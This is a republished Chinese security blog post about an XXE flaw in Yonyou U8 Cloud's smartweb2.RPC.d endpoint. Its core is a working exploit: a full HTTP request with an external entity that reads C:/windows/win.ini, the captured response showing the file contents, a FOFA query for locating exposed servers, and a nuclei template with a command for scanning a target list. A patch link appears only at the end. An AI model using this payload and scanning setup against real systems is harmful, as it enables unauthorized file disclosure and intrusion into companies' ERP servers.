用友U8 Cloud smartweb2.RPC.d xxe漏洞

admin 2024年3月1日10:33:57评论44 views字数 3375阅读11分15秒阅读模式

使

先介绍下什么是XXE漏洞?

    XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

  XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XXE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题。

01

漏洞名称

用友U8 Cloud smartweb2.RPC.d xxe漏洞

02

漏洞影响

用友U8 Cloud

用友U8 Cloud smartweb2.RPC.d xxe漏洞

03

漏洞描述

用友U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统/hrss/dorado/smartweb2.RPC.d接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害

04

FOFA搜索语句
app="用友-U8-Cloud"

用友U8 Cloud smartweb2.RPC.d xxe漏洞

05

漏洞复现

向靶场发送如下数据包,查看C:/windows/win.ini文件

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1Host: 192.168.40.131:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Content-Length: 260Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

响应内容如下

HTTP/1.1 200Connection: closeTransfer-Encoding: chunkedContent-Encoding: gzipContent-Type: text/xmlDate: Mon, 08 Jan 2024 03:01:36 GMTSet-Cookie: JSESSIONID=F8DDC953199005CDEA9538451210E68E.server; Path=/hrss; HttpOnly<?xml version="1.0"?><result succeed="false" ><errorMessage></errorMessage><stackTrace><![CDATA[]]></stackTrace><viewProperties><p name="__profileKeys" value="; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1" dataType="0" /></viewProperties></result>

响应数据包中含有C:/windows/win.ini文件内容,漏洞复现成功

06

nuclei poc

poc文件内容如下

id: yonyou-u8-cloud-smartweb2-xxeinfo:  name: 用友U8-Cloud smartweb2.RPC.d XXE漏洞  author: fgz  severity: critical  description: 用友U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统/hrss/dorado/smartweb2.RPC.d接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。  metadata:    max-request: 1    fofa-query: app="用友-U8-Cloud"    verified: truerequests:  - raw:      - |+        POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close        Content-Type: application/x-www-form-urlencoded        __viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'for 16-bit app')"

运行POC

nuclei.exe -t mypoc/用友/yonyou-u8-cloud-smartweb2-xxe.yaml -l data/用友-U8-Cloud.txt

用友U8 Cloud smartweb2.RPC.d xxe漏洞

07

修复建议

用友安全中心已经发布安全补丁,参考官方信息进行漏洞修复。

https://security.yonyou.com/#/patchList

原文始发于微信公众号(AI与网安):用友U8 Cloud smartweb2.RPC.d xxe漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月1日10:33:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友U8 Cloud smartweb2.RPC.d xxe漏洞http://cn-sec.com/archives/2523557.html

发表评论

匿名网友 填写信息